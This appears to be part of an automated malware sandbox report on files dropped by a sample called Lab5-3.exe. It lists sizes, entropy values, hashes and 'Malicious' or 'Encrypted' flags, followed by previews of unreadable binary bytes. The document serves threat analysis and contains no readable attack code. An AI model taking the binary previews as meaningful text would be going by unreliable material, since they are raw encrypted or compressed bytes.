                                                                                                          Preview:..m.u.h.7-!O.7T...z<f...b.5W.H....ja...L.A.:...82.Y'-..x.I..rc.....L....Ts.&...$=..].|.m.....L....<..^...u.$........mj.:..E..`r.x......H........<k........2!.P.Z..rg.gA.....7....]....UBx...^..@ N%+ ...Y]q.\....G.A.../z..X..Y....n.w.Z..d..L.A..G...C.z.Z.[.#..GR./......ar.+.....h...fu...Q./.T.a..;=.>`....VHv...mF.V2...J.=...;.YU...T.I......-..A).@0.f.`.R.'..C.(.d6.\.j.}.f.a.....n........./...>.d.;0.=.....,..u.%.U[KN_gU.8.7.g.....+5\..<{/G .dN.....}.ZQ....j./.5G}2L.^N88@7.F&P. q.v..yBY..tQ.KA"s.)..9...f.....s.?..T.\.g!.l.k&..t.9...[~f.N.;....0.-2.vn7b.S..7...Lm.J...Z...i...o..E..R...t..^..oQ.v[,.y..t./.\....#.p..'BKI.._].;..A.x.lZA.ir...{.R....._.9.....#{........w.~,....O...@LF.)t.g`.>?.,0.b1.xP(.9...j.4.R>....>.q...(..T...dnOy...^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):6272
                                                                                                          Entropy (8bit):7.971564721881787
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:d978o2i7z7E6sk5DWDR84z4m6y/CKxw+mDMyokq/5gx8a95Kjvk2pLTMGx0uKeYO:d9d2iTE6xB/GZBmYLy6aWzvpLb0Cb
                                                                                                          MD5:74C9CD927C2F89F410A1EB56E68E4B49
                                                                                                          SHA1:6CEA140264FCB89EC7BD47CD83B0D42FA0EA8642
                                                                                                          SHA-256:F2E99C26E86E2987CF3EF019F2EF5D1083CA21CF12777BB318655F5C83EBCE91
                                                                                                          SHA-512:1726B01AF2729A50193DAF2A6F6A3BF06FC7B1771151E6093729C3872B7E1F7D517C2F59D74769C6CA13256C2EFB8F1E87CBC5195675DE250C2F6D03A722E8E4
                                                                                                          Malicious:false
                                                                                                          Preview:v.-........ut....c.....$..&....S.......?8.by.q..~...r:.P..c..e....G...*.FD=..&....S...@..R.3.....f....|34+.../q.........C..K.E.S.].........\...m.u....G]8.F.s...m.A..:(i}.N...`#!...8 F.......i&..n.k.xu...:.......y)S......v....QXEf..IW......u..M..TZV.1.G%...X0/..EXm.s|......L...<.a?y.....i...%..6....+...X..+.P...$.4D+.>}9+.....R........C.L...F...|.....i[j..F..-...................?.\s.0.....m.#..{.4Tp...@...'C.......Tl...|.6...[(..Y.t.<>J..*`.V"*.W).:.. c...W.)".o....a..d...N.~...ZG.'.A.Q...RSAf........W[t.F.........R]Z..T..........bos0>~{.u.._...o..Z...C79%-..}......%...JT...*./..~.....2."@_.9.+ ...+..[......-yTw.2b1E.n..pX.s....@.].r..._...S.._I0.C...5...+.c..2......R.Hx.._.D...^..)?....'....M......*V....[I.c}..(..D).......}..d..Y..w..Hc<....;.*.n.I...d.MS.... A.w.../C]o..TX..?=k!....<.=.".g1.../YXe..j.!.k".C.|C.R.V.>hw".!..7..)Jl>..;..C.......b...n..+.^.......F.1..+o.#/I.^......W.J7...pA...n...).y$....A....-.@.Ck..4..p..!_.E..c...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):44080
                                                                                                          Entropy (8bit):7.995167234781272
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:i9cclRy/mQb0jBqbkbtSD/TZoFDW7iIQoGiyLtzQ8oQD8AIfJSoZ:wu/zb0jBqbkbi/TZok7YiGNKSoZ
                                                                                                          MD5:71BDAEB443553035050A637EB89FBE9D
                                                                                                          SHA1:873EF90CFBDECFBBEB6F08B0D52147E51C0D7E85
                                                                                                          SHA-256:972F94821517C4F51F0F0774FBECA5AECDA44577508E97C97B053719B8D31A70
                                                                                                          SHA-512:29D2BC94AD0596FF25832B42381D472E0246E534EA93F1B1D181E81D1E66EE99E98183AC1926205FB76285DB57E880EA14B91AA1A1DEC65BEA1A2A725AC90066
                                                                                                          Malicious:true
                                                                                                          Preview:l..MWD.....m4G....(.U....|$\P9f.>X:.......4......!U...c.cqoj.....@.......K......y:..V.x.h.L........h....p/..A.....U..Y7..6}/..R........Cl[.: .=.z@C...{....*.A.....dB..K..&..........#)).k.D4...c.".f+nO....4.e..J.pR......-x.x.d $.....,.\E..[.P....Z.l...&.:..ZG7c.#.......4-."..9.1.w.(.k.>.\.6..s.l..>k.E......q<..}I=A...".jq..Y.U.1x..hA..y)..k%...O........*&6.!...GAB[.G...x.v..7.y..s..8;b.l......1.v....[..MV..........)./<s).$..SH.Q.1.S....*..CP..c.R...0.p...^.G..A.=...;I......u8f...3yx;.S..>......Cw.m\...no...W...E|[F.`G.~..? .E^.....K..z..%.*O.\aJ...Q..@3.B...L.H>%.>Be..|..jb.Vu..s_.Pp.}.P..M1...h...t.g..wyM....2>.Iz...@.0M......."..i....+..W1.N.a.}..L2.V...........Zs<(...*.J.g....thB<\#..^.h.S..........d..,.(`..|{..2....l.#..5...u#.^8.FE,......7.H.X....U.....w.6..<Z.......0.l..6....}j...;...;F.U&.a.TS.6.DeF...F.qd....Ua.T.s...v.V.=...L .uRJL..=.m..@!x..g..c.P....9J.Z..C..Z...tm...%.D/(XS&;....0.>I.........U:A.{.)..B....+.V.}.......,.%..<KQ
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):463506
                                                                                                          Entropy (8bit):6.853645965698937
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6144:Vv84Q40dgEy40YS1su0M+ASDs1QfGnhxFdko9hKCgIzDn+Z:5FQ4eS1vjtXukh7d1rKCgMy
                                                                                                          MD5:F015C725EB4954747BDCF628AB23ED71
                                                                                                          SHA1:E852016712505C40A4F7FA0EAB20C4ACC297BAF3
                                                                                                          SHA-256:A1BC3E07FC4818B2D9B346EE05FC150A0EE8D1EB39907A37740B3188103033C3
                                                                                                          SHA-512:34C830C7C7653A73768946B61C0B0A524A0CC56E7FD060CAAAF7AEB2E8B24886E7742C8B4A4903264EDAEF7F09D7F95B66C2290D26D1746551B9BA59B3C3CB53
                                                                                                          Malicious:false
                                                                                                          Preview:..;.....:...(..3dR...3.....z....@.]kCNyk...%......IyT.C!.~]...QJ..L...m....e...N......gfIJ..'|E.....VB.[.p.i..,..8...t_.W.W;.>...x;'O.0.y..>.1:..!...4..rhV$...'y0)[.j.).u.....~@..jFup'...%...y.....b.8V. B8v.p.8R;...e...L....C.6t...g...5H..."F...C...o.....1.i..J.r.U...L....O\....gKp.._..1#...c..ce....0E.....C...z.vl....>..K.]..K.K.A...P....^...{..B.Z.A..,...g........].JB.(c..paHL.*.....N>..V../.-).@B....zj..q..3.a.C..21.#..Io.M..n...fC.........H.L.'...]obT..Wm....?8.Na.09..AF.4...L:..'.n..$...-....v...N.!lQ.;P..pz....... .C.|..<x.(...cQ..!X9.8..n.61.l.[W.|.3..p...L..>s.1...wY...#.2...s.b..#.]....^4..][... }.Yx.n.n....^.".,..ta..a4.n.H..c...=p..f}..8.N$.w...V...K..39.}t.x}xU..J...w...H..dg)......2Q.G....i.k.R+_...<.-&....S^..:..BR Y.yO....a...%Y..>.n.87.BY.&.tqv..".....G7=.\@R..=.@....x.....^....}|].|23PA......g..r.M_~9.k.2$..K..j...2..0.N?.t..A1..k..l.F:N...OY.cD".^}...g}....._....U...z.B.jO^.L...H[.G.~.......z.|6...W..d.t].^)w. .dO...S.Y:T.*.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):291194
                                                                                                          Entropy (8bit):7.859559268277218
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6144:7kfBQLMJ2pD1GNxXIbIWZFv3WbXpOeShEHjxHyWs/zIcGnivkuX0b39/22ZOKyyP:7kfBQL/DGNxXUIgvmDcvmVSdzIcGniv6
                                                                                                          MD5:4A1BE390076511256649E970A5A35B5C
                                                                                                          SHA1:625D55FF2FD090C81CF203FB895BC82542BC7503
                                                                                                          SHA-256:FF8994CA4C6662A3CB42E1796FBF9F70FF0D99E8C68AAA512D26108E5B2A5C5B
                                                                                                          SHA-512:45E50E1AA12B9BE36FA2627EDE09004D57D9FECC93A08A131358246587AF8A48B1FA8E236C1D2FD6B9330B5A43CEB49D7F060F3E7AFBE770AB7D0D30D31A8452
                                                                                                          Malicious:false
                                                                                                          Preview:.v.&"k.f....a.K.....R..Ek...*LD3......Y-.v......,Le!.V]....+t...Q.Y....[..29.b.ZC......+g.V&....8..hs*]..{..j...h7..[*..x,../.....Y1.Q<..9S..{.....S3..!....R..m.R|0PQ.wbd.P..IW$?%YjsE.~0..-2.~.9DX.Zw.*.c?)!..DR....3#G....&3.~J3>V..RD.*.t.p..T..g.!.-KMu...>..K..Yh..Qii.\.t.EN...&..9...2.9AW.g1.N.mH.cZkq&J...O.........Cl.yNv.T.....i:p[U.=.6....L.....Z.p..L_i...1......c...S..q.<.8..&..3+K`,..F.....5...6.rt..U.X...al5jF..w.- 6......U....~p..eT.,k...*...\...l.l..?.x.361<.6.^*c..q.......US..,m...,X..~...}j.diZSei..?.{]..H".b...7.9u.+<g;9~..A..Z..>.4.?r.LE..:...E.......`?..1.F5..`.H..c..-......*n`.....:.c*...|..."....8@...$0..5R`.e..i[>...i..F.Y`.K....P.}.4Bg.9._1..S.?..3....w.....a[4.J..0...U.Y....}...r=I..YH...\.t(Y..0:'...".`...t.>........Q..JmO....\.g.fm,(!..#a.u.p..P..d...7<...>.ml..-..X.6hM|..,PS...g).B.o)K'.........]:..k.ql.i...j.W..pFN..g.S.F~........#.S;8..u....N\5.;...._.O.=s.C..64..D.P....._..y.T.........>.nDGcg{...l...a...M.jw....1{...<.U..w.).....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):99792
                                                                                                          Entropy (8bit):7.998202027813473
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:1536:94M/mT+inXJ3IrblbFfJUyIdGBmJciegGHor2JhxBz67Ky++HZfxpVxBQZ:94rT5J4nBptgd6or2rxBz6eX0Zfz/BQZ
                                                                                                          MD5:0CA58634DC4B095855EA5DDAEAFD4501
                                                                                                          SHA1:61F9805A6287F998F7B2F9C414A5B211E493AADA
                                                                                                          SHA-256:1CD683CA9CE49EFB7C2DF2918A0DFCA4E5787B1A1E446EE4171D2170B3123317
                                                                                                          SHA-512:C53A22FD6CFC1BF6C6DCDFAD86D75C2674EF674F87159016970B37001BC4EBEC3A6B45605D119351A71CA36AE3AEAD9AD697430D68CD22A69448F74CA8CA3AFD
                                                                                                          Malicious:true
                                                                                                          Preview:g.c]0Dz.. ....a..~.fv..Q.{|..R.7.....SO.FPw..8...Ky?>i.A...?Bmv.G;..S4.....>...S.y..Hv).i....X..:#5.........D.B..!XU..@..e_.9A.Qz.+K....>;......+S..:1...l..:^<.......oD.....=.h.Fy....0.]...Q.".6...E........D......C..rT.6G....(%..............KZCF...Ov,....T..8.y.r_..H$yy......p ...J)...c..].G...&.N.............G4=.gm.t.T.y...~. /.#I2.....#r..z..&...Cmb:.i..|t.Ab^......@.(8u...XS........ )w..T..E.u/.D.|..%....#.... -v@I.we..\..nIza...;.."B...9v...O..)s..45..1.I.E.g.Z.........GWgb%T9.sO... ..c:+_{.....y..t.^.'Fm.H.+G.ts....\r...vL:..(....P]......N.S.......u%.x>.M....0.......z...?....E....q)).Q-.l.. b...........(PG.S..su.f..%.9..z.....X..3.&....N`.~z..>...^.r..TV..]rg>le..}.]F..C...T~B...Oz..ua@`0N..6..-e.T.M.YMo..A).n..YJ]..,. .H.L.V. ...-..J.!H.d1S...j..8.O..m ..$PGY.^.B..D".....`..!1^!9]......S./.1uIO...m....s.d.3$X.Hc.4?(%.s....%2..n..N...xj.E.E7`.. 5.x|}..i....W<3...u5+T..0.B.9C....=4...G$$.....b....cNo...'...."....d.4.......IM%7 .R.lgR
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):397132
                                                                                                          Entropy (8bit):7.187537972671588
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6144:rSYhzJYe6r+9MB1KNp7SfQZGyhHG3k5TFny6dRS9z3PQ3CZ:JxJ8r+GuXBGz3Y32
                                                                                                          MD5:43A3FF5594411B874F1C888AA4070049
                                                                                                          SHA1:241D0B47577BECB0038DD534C61023E36426AC8B
                                                                                                          SHA-256:F23D8A9DEB700FE01F16E3C879D9E36693E08994AE488FFCD1037228A3485E02
                                                                                                          SHA-512:244900E2575AD75B737A008179BDBE9CA0A11BC0A8D0D2C2E5C14B8FAEBF2DB3E1226C29909FB537DABF64D3BCBAC0E468D2E028D38A123E99DBCCB7622087A7
                                                                                                          Malicious:false
                                                                                                          Preview:&..R.X..R@.IA.....}R....Dp..{.f.<@..O....[rx_..Xi.........0...>.L....A../D..G}\Y.z.z. [1ql... d.hM.).H..Ih.E.CD....~]..?....$..+.....y.....X.....N9.F.\......9...Z72.....s....P..]...Aaw....'...."IL.{p.M.k.oo..._.;|C...!..../$.r.z.......Z.F..B.R....@..#........q.$..'.....Z.-...-fz..Y.....Omq#.u.Fx.~.)O..qd......\.......CD.j....@..3(E.DK..x_......w.v.wR..z..hN>.......@..%...NN..s.<i0wWh.$>.W.:.\..=ML.D..sn.5z..-.E.....}...g.......E|<.wS[...l...qE.......WT.$......6]....k......%.....8..].E.....3..].z.P....3....C.W..]......R4...U......J...W.....3r.E.`sb8vTd...).....D*..f..Soc.<...!.U.............3#..7.....J...m...P..%.Y....|....m...lo.9....#..~]..,......Y.v.Bi...C.7k@^.........|.*._.S9.....9i!K.g..T.+. ...C...;a$....(J...fid'=.g...)....X... .^..@.I..._.M...7E.......@gzp.X.8.......OZy..........Yz~@b]..O..;cek...7[..K~{..x..../..C.........A.Vc.+$..s}.8-dx..AK.5......Mrj..'.{.{^(7}r...S2....r].1...)../.u.....C..t..0.~F...f.....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):139584
                                                                                                          Entropy (8bit):7.998671968763673
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:3072:mmJkZg9RU9DVPzI8hfQPPLqCuX1Cz6AlDx32l8K7aUHWesVEk8hU+dZ:mKkMR6VPUcQnL7u01Dx3lYHkVgdZ
                                                                                                          MD5:B4E89B1B7326E0BBBA3EB2CCAA48C12A
                                                                                                          SHA1:54D0932D334CE2397C05F6EAEF82A9B09851F1E2
                                                                                                          SHA-256:2FBA31CA497157C99CC5883A1DB8B42035C3FAC5DF10AF9B46075F7B743B4111
                                                                                                          SHA-512:20F4E72D07E8F07AC51C10EC02603D739CC8D6063BB8D75D6DD244826BEBD8A9488E0AFC9676FB6399FDAC0E1296B44F229B77DFB3623E355926C61CCD3C3533
                                                                                                          Malicious:true
                                                                                                          Preview:....X.$..M..W...t..7hEd..8V[yL...E..Uj..@..v...b..,Rf1..o.h..3...H.6.0.^R."..\..S.....w..6.-.:..'.]..w./..<N..Q......-f@.##..bx....@/...Y[.n.h.....Tu.t...6.I.Z...-..X.~........G........zo...{._)bx.CZ..]..w.<ErE.&5K..BwM.Aq8...Q_...^....DK...'....K....,.:.u.Vb.k..{..T....1}S..'R|.c.0%..a.u.9s...(../..|.o.1+h+...`B..6..$p.@..4.....A...r..j.u.8...A.L..2......M.;.G...y&$95.[S....L\.:...N.QT.>{Y=.J.pv............`.,.....jPi_a.M.........D.}p.S.&Vn.@.J.[.9.&......<..M..c=.56...w......N7...r.@...$.....r........v..l....1.%~..i.|...sUU.G.....<.+c..(.........R.:K..N..)t.K..Rv....].Z....JJ9dL......x..g.9...O~..U..{...8.S.....3.$..K.3......d.H.T...sk....W*...EM`r....);.N...+.....<...>(i_...+.....P.G..\l.k.>..}L.D&<..9.*.@]Am./.!...T.."....^..1....].....z.t.+.}....Z..,.%....<..|...q....7.!.\.B.*XI.@...P..J..K..g...O....a.M.....o..0.I.=Us$.....H.l&. z....9<../&..R...*U..0.U.+....~dp.!...v....2...ih....,.}.-.#/O.c.....A){.`x.a.BQx>})...#...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):11024
                                                                                                          Entropy (8bit):7.981061646480963
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:aF6OFghLISLgWJ1A5v8p7WokB7fonIV45aWM1DuJmzd778zCXjOyC0Cb:KFI8SMK7WokB7fI5aWM1DuJmzt7SCXjS
                                                                                                          MD5:BF2F6E4AF9248C4EDB0CD3A9C1D6A36D
                                                                                                          SHA1:788F463C30F139194B2A2C359D26E4CC9D07305A
                                                                                                          SHA-256:F791244211E6940B04095DB55F1A394E189291D187EBB712F452DE0C3D097D8E
                                                                                                          SHA-512:50B4BE15ACA02B5BEE7FD9DE4C946C4AB69BEE49B8B675F90168555519729D68170D5FD563D69A77F604BD3610816571FF87534FAA8A7E2C4587F495A71DDA6E
                                                                                                          Malicious:false
                                                                                                          Preview:...M....9.....Hs"f..?...?K.....W.A...NJb^...s...^WtG..ju2..5.i~..p....]$..Q..S.m.z...*.F..C..'.Vr....9YC.$..Q.Q..wv\...X........C....6.....)....(..=..........l......1..........n ..+...v...u...!....w...%...Ck...I..Q......H&._..>i0..0x.F.X.g.....X$\.`1....s..|..,yK....U....h..2....E.C..j.A..g...5....H...q.......Y.GzK.....RJc...e.H.u...o..e];.p.:..^Mz....XB0.'.H...O.tE....h.{.C.%..+n..s#....O..g*U/.JW...*.D...5o.=...ZT.Q...s...B.,Y..v....1....}P\...VZXUZ..../wkv....Y...`...Hz[q-N.,..Ic.....;..d.`x.7fs...T..%.b..o....k.0......V Q.6....K..W.l.R..m.. ...z.C5..f....#..U......O...,..w=y...^...].28.[....cT=...kL.f..3}0?[..|y#J..Hs.+....Z.x.Ol.i.1..5a.w...Y......@.'J.[.....3z......"4...W..j........G[..%Jb..etn..B..>...N.a..z.........s.'.x..$.....1...y...k=..SDA.O..*..|.~L.8.C....]/b8..Q...S......T.u..4j.......66...5.7|.9].+.MJ.......F.9JV.+....i(...dFY.D..>..........@..l......|h..2.f.4..8.b..E.H...1.C+.MN...sv...$......r.....y.s..g
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60048
                                                                                                          Entropy (8bit):7.997378658324887
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:1536:u+ML/6mq8v2kJuqaAmSDiZNlCPGV4frqM4+3PZ:u96mqe2J0O2GVjMl/Z
                                                                                                          MD5:43388A13F8468D7C5D189A2699B46F38
                                                                                                          SHA1:9DD57A41DD653079C0A0E8E470336C863B5F0A72
                                                                                                          SHA-256:6CF3757A218A8190CBF2A06560D458D46F2EFC0AC393210D5CA202BE28D2E506
                                                                                                          SHA-512:86DBAE197B6642E70F94A411D80D4657D7B6CC44083D2F38A22ED72AFDEECF60416E6866F08CA52F9BCDD9C4C35B5F8F870FD1ED05BA3235A691114AA248626A
                                                                                                          Malicious:true
                                                                                                          Preview:...t..z"x.|6..)_hQ.....y...h..MM...G....../H...|_...{4...,.....PC.~Z)y.aV5....^.h...?~_yEe...L!...eK6...'b.s......!hsC...6..........-+.s..H/'..B.R.........xH..G3<|).]]....Z.Z.............s(j......... )o..R.s.@.|.^....Z.x....Zw..U.S.......m.....g~.M.e......l...9..s.L...J....}.....0...*i..>..?..Q.<.....b%......d...=...5.._..u...p..@.s.p..r2t.\L..d..9.3.'.S.(.g.Tbc.@.l..1F..L.....X+.eK../.!....0B..4j...A.x.....,J...j...y.9...,.v..$...#.F7...M....$.a.-.s.L.q.F5..z?tlT!..M...K.0Q.^.....9`k.v$....|_.Dq2.X.R>.1.....9.,...A..w.....(..t..|.WP...r..H.w...r....C..-.Jiz4..B..l.........9.l..h.p......il.....b...KAZ.....`..5Jh..L..E...`x.....w.Ue....,;.^.."..Q.../..PD.C..U=...T:'s.i..n..j.OV@V.<.Z..i.e....J...^Z....`...P....oh.Z(.Me..Ix2m.+VA..mxR..uma{..Cp...,..P.k...\^}......`QZD....-.QQ<..f4"XT.B...R....x.n.e.@...'.yq...ww........ ..l.......)dM. G....D0j.-....5.*.}}+Q....`...6p...A&$..C9..7....Q%..Z.a....v.~...T.=..5.3V_le.......,..R..'.......5^..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):113904
                                                                                                          Entropy (8bit):7.998115130571595
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:3072:x1g4KlvMltAmRYT4jLOI4wyaJ6z/RRe3tSFuGUlxiETKyOZ:M4K52iyY0uIGaJ6z/Rc3tSFuGUlRzOZ
                                                                                                          MD5:61F8760927496FE92F79C97595193BC8
                                                                                                          SHA1:F1FF389AD2BFD11EB6EBE803B31B016B0CDF7127
                                                                                                          SHA-256:6F1FA098CEF70C784524B17E17789DAD8826D49670C6A89D546CC9ED4EBCEEE4
                                                                                                          SHA-512:23E58E9F4815B91B05099739F6AC9B7A1AFD2A73B50348CA85601F7D0EFC56FD56F7650F15E0DAC09A7231D6ABE7C4417D33AB01270714C5A86A8C0225268B81
                                                                                                          Malicious:true
                                                                                                          Preview:.....T.....P..:z...*V.......<............v8Cu..'.@..k.h.).z.7.#.:...|..x.........W......5......,.g.6,.aZ.t.J....s%..z.7.....IuJ.....[q.2.e....UA.."6Z..6..u..2..f...z....}V...9K>..../b.|Uyl[R..[y.s.l......+..$.....{.n.?..r.7D....Z.~.9..%.]*.....X)pl.-CTV....'..........F....O.s..x......0.h.No..p.`.F0.I.3.f.....F..n.O.e...{..[.1..S......F..nR.t.,.._.{.F1;..8."..'.9......JKr.h.f...QE.]..\I...._..hc.9X..w.P./G.e.`*.[.j.R8...:S......E~%D..<}..?.b...U..>.wo...5......P.g..76..:.....\.c.]'c.b\2`.y..q.+ex.RH....`...WQ+......=...e.L.mc..^.X.1....b..................$yv.t1.K.....T..6..I-..`o.z.....%....Gh$R...p;...........?j.O.!....K................G..}....}..S*N.?...C...UQ.F.I......f...A(Yv...x3.k..G(....\.R..[..)....s.nD..>.....9w.$C.?..s.pYq.2.S........r..Oe.i.......H.7...}.^0...%..ln..+._.C....\.F.s.......f.^.W,J.W}.?.=##.j..M....,N.....El...|o.X8r.C.....5Y...7.#.-9.A.3j...1.K.}..4._t{b.....Yk.................I.$.m.....2.2h[.Sm.L9.D?.....y....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):8928
                                                                                                          Entropy (8bit):7.979193118153844
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:H/kCe0tPEX8b/2b7G8yCvHR1BdcoZIofyZKwEQoWyYU50Cb:fkcEMb/s7GjUx+Wtw7oWyYU5tb
                                                                                                          MD5:D8856B00FB41F68A3687297E8FCE8AE1
                                                                                                          SHA1:708EDB768B5FC236CBCDE9C10898D43DEB76EC7C
                                                                                                          SHA-256:6BD807EE65E96D8209A1180CD6C3E59DAA890692F927626FD07B69A951616DB4
                                                                                                          SHA-512:BD111F1DB6D48FAA810443EB7E494DF097B1141E732A55EB75A7046E8D804E2E228FB3827C4CAA52A42509FF6F459C61E6CEA311A51FECA9BE335C6AD2612D2C
                                                                                                          Malicious:false
                                                                                                          Preview:.B...,....j.Q."...[....q.E.#r....{...".\k...`.....iE.o...8..<..E..@.+."v.C.......M.......,)..`.y.I.....-.s.b....G|...........`g@.3..gd...fh..a..4jD.....].t.Id.6..B:...0\....C.;Z$.!..+8.....C.Q.@..*M._7.M...K..]AH. ..6.z..p...`.,N_[.1..7~.y.}.U:.A....t....X.#G...lu's.......5P.].....Z.%.V...[/h...F'.......hi9.K....W...G..X....jN.....A."...&.0.f.....9.-.....Il..H..[......K.cJ..xCG[...-....c....C.v...........%H.-.:.L..{?..y...n..u.>..< .|yud.~/B.N&(..N.3.........(0....r..p..6V...M.-..Z.`..X.....z%=.7.K>..FC.@2`..i.v....l.....1?..S.(...k@.....B.?.}...a.D..X+@....Z=(....u3...S...<.Gv..d.cD..dP.K<;.}c..|8....@.b...'?...S.U#.Al..Ef>:...>;8SS..KH..G..w]-)....E.o~..5..m...1d...7!Q...i......3..(n..E.9.......h.2..IV/...J..i.."........9...v'4.xce..IuM...5..](r.A..5.^..d.....f.Q.H..K.X......d...o..._.....VC..4...#0<<.....V...P.P<nf..+.....&#......(O.(@......o.....a.ANJ A.6...{..AC.....(.0...f:....HO.x.....Tdf.G`I.......:...W....i..Wi......i..h.Ye
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):41312
                                                                                                          Entropy (8bit):7.9959485323765875
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:xEm3behPyT783mHXGKQCwPda51jt1HoQaWF20Qxva88RSY+6m1PjZ:xEm3beZyTCm3GKxw45B3Ho2s3xva3RSb
                                                                                                          MD5:6B514F2E9C4E04C5500B4964CA974859
                                                                                                          SHA1:1F701A780312E050CAEEBA9F16FF5266DB7D0707
                                                                                                          SHA-256:888B951FFD525871178D812189B2998AF3D5BC1049C94D1D7B917CBB90A87D99
                                                                                                          SHA-512:55DEE82DD3A0A53661E3AC71373B5FBF8BB61FC03BB2DF4A8AE3E56E3FDD17F7579591C5363FD2915D3822AF0F209FCDDBB4848BA3700A4226DC4A63EDC7C04F
                                                                                                          Malicious:true
                                                                                                          Preview:@i../....'H..>.Q..Yu.=.p....&j.n..[.-.....`...bp.z8M..Z..l.Cg..z..S..A.D,......yG..p...!...@....t.l...S...=.....s....! H..=.....+.......o..v.B.p..2.4.....`........)....v.61....]...o$..?...}...l..#. <....2UMhf.._..{|..".]..&...;H..v.'2...TbK./%.6..o..Di.\...0tXB....U.P.<..M..N.M.|.Z..C3r...dJ=.%.~..*~.j......eT.'p^....a.q...f...W...f)=B(EN....).0Q.+Qw.....;Dy.8C...Y9..@(x.j.;..+k.UZ=..5Sf.....e.....rd.H4..3.]...[;.r.N....5.L...}.QYj N3=.XYcX.F..0.~;Z.. x..AQ.L.q..w+.2.....r7.l..1>>.+...`.3.`....<..5c...>...r._......O..'.W2........I.$.Wo..S .....-.1.r....%:.....v5.w..p..Z..%lp.E.a....H.i.'v..^..H!...J'Oix.5..=...._KC8.....y...F.5OJL-...\.....C.yqi@.!.BV^...dh...g.X.b.(+.d.D......."\.@._.F.Y......Y....k.&........N.x$.L....D....k..>i.......N..l.`.w...i.*..Oy.E".q. /!#ei..X..'n.....$H.]k..)G...g......."..$T...[..?......'...M....-...."Z.q.W.|H....6~..f.......e.G.....,..vR...w5J...,..W....I&...,...YR. .]...-..h.kdr.D.wkfx:D.(,......XD....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):19744
                                                                                                          Entropy (8bit):7.990003294958145
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:384:wTux5K+GkteoTIIicGwa5le8exXFZ9FdDTw8v3TFs47WdVtb:wq5pteUjGwee8exXFZ9Lk2YZ
                                                                                                          MD5:466A57A3604E0939E58E2B92BE8EA4B0
                                                                                                          SHA1:70E68F4BC65C7F3980BB9841D16BEC37D63ECD8C
                                                                                                          SHA-256:F8F5836F8F993E2BAF9CE403706F4F5624F62DF2699718C8D8547D885C888BBC
                                                                                                          SHA-512:0F8CB9F19187C77D52154FB79FBFD6818406A82331637FDB22CA2016D47D60B8CBDA3563E20C9FB2D91EA1606CFA428BF8B7883DE455E3B14BB7FB061262265F
                                                                                                          Malicious:true
                                                                                                          Preview:{.w.,2.*.G............S...ay#.9..k2xj....2$.+....v.(..d..H\.d*...[5.~..X.fb......Z}8..O..._.h~.....L`.?aB..L..7.M...\.\9..........y..6.L...0.(.p.a..(..C....`......X.&....n..t.......AJF./.4r.....R.Se.uA"O...3..K.gq... ...~.........Z..O_.O..av..ZsP......E..hg..V]....+..Ab..%.........C.s.I....tC.c......GO>.Od.o......y#.... .S.d...C....|.,.1..jd...%....i...Z.....X....SlI,...B.tP.c.m...'.>.(...C0._55.q..0.d.Im$Oh...gu.,4...=.%_.i..p..v..O...Dcm."..27.u.;.......;.F..#\.q.0.>..2....s...t.i4.<:..I./q...G..=;...!i}...W..K`..E..7.(.3.....l..K,A.%i.m...=g.....0v...B.5.....X.`}..fX..P.gx.y......JLX....D...v...._.y./..h........X.c.3...Q......a?...3J..@...7l....c..Z...@.G.........>].u.wp'.........a.0}!..Cc.........PY.d.+.....wa*...K_..uhH.T...-..{...K........'.V.\.A...|......G..jN.Q]f..2..-.......{.{n..J../.W...J/cB...D4N"K...lW`2cynk.....g.....l.....C.-4Z(..E5bj...x...$C.n...k..@&.b....zYw.uU.8<m.6..U.....e.7...3..._.........Z7....IBc_...K.cu...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
